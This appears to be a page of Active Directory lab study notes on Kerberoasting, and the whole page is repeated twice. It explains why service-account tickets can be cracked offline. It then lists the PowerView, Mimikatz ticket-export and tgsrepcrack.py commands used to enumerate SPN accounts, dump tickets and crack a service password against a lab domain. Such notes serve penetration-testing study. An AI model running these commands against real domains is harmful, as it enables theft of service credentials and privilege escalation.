Priv Esc - Kerberoast

Offline cracking of service account passwords.
The Kerberos session ticket (TGS) has a server portion which is encrypted with the password hash of service account. This makes it possible to request a ticket and do offline password attack.
Service accounts are many times ignored (passwords are rarely changed) and have privileged access.
Password hashes of service accounts could be used to create Silver tickets.

Import-Module powerview.ps1

#Find User Accounts used as Service Accounts
Get-NetUser -SPN

#We are going after svcadmin MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local PrincipalName
Request-SPNTicket MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local

#Export All tickets
import-module ..\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"kerberos::list /export"'
ls

#Crack the Service account password located in the C:\AD\Tools\kerberoast
python.exe .\tgsrepcrack.py .\10k-worst-pass.txt 2-40a10000-student529@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.local-DOLLARCORP.MONEYCORP.LOCAL.kirbi


#Import AD Module
Import-Module .\ADModule-master\ADModule-master\Microsoft.ActiveDirectory.Management.d
Import-Module .\ADModule-master\ADModule-master\ActiveDirectory\ActiveDirectory.psd1

#Request a TGS
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"

Get-NetUser -SPN and Resuest-SPNTicket

python.exe .\tgsrepcrack.py .\10k-worst-pass.txt 2-40a10000-student529@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.local-DOLLARCORP.MONEYCORP.LOCAL.kirbi

PreviousTargeted Kerberoasting - AS-REPs NextIV. Domain Persistence and Dominance

Last updated 4 years ago

Was this helpful?

Priv Esc - Kerberoast

Offline cracking of service account passwords.
The Kerberos session ticket (TGS) has a server portion which is encrypted with the password hash of service account. This makes it possible to request a ticket and do offline password attack.
Service accounts are many times ignored (passwords are rarely changed) and have privileged access.
Password hashes of service accounts could be used to create Silver tickets.

Import-Module powerview.ps1

#Find User Accounts used as Service Accounts
Get-NetUser -SPN

#We are going after svcadmin MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local PrincipalName
Request-SPNTicket MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local

#Export All tickets
import-module ..\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"kerberos::list /export"'
ls

#Crack the Service account password located in the C:\AD\Tools\kerberoast
python.exe .\tgsrepcrack.py .\10k-worst-pass.txt 2-40a10000-student529@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.local-DOLLARCORP.MONEYCORP.LOCAL.kirbi


#Import AD Module
Import-Module .\ADModule-master\ADModule-master\Microsoft.ActiveDirectory.Management.d
Import-Module .\ADModule-master\ADModule-master\ActiveDirectory\ActiveDirectory.psd1

#Request a TGS
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"

Get-NetUser -SPN and Resuest-SPNTicket

python.exe .\tgsrepcrack.py .\10k-worst-pass.txt 2-40a10000-student529@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.local-DOLLARCORP.MONEYCORP.LOCAL.kirbi

PreviousTargeted Kerberoasting - AS-REPs NextIV. Domain Persistence and Dominance

Last updated 4 years ago

Was this helpful?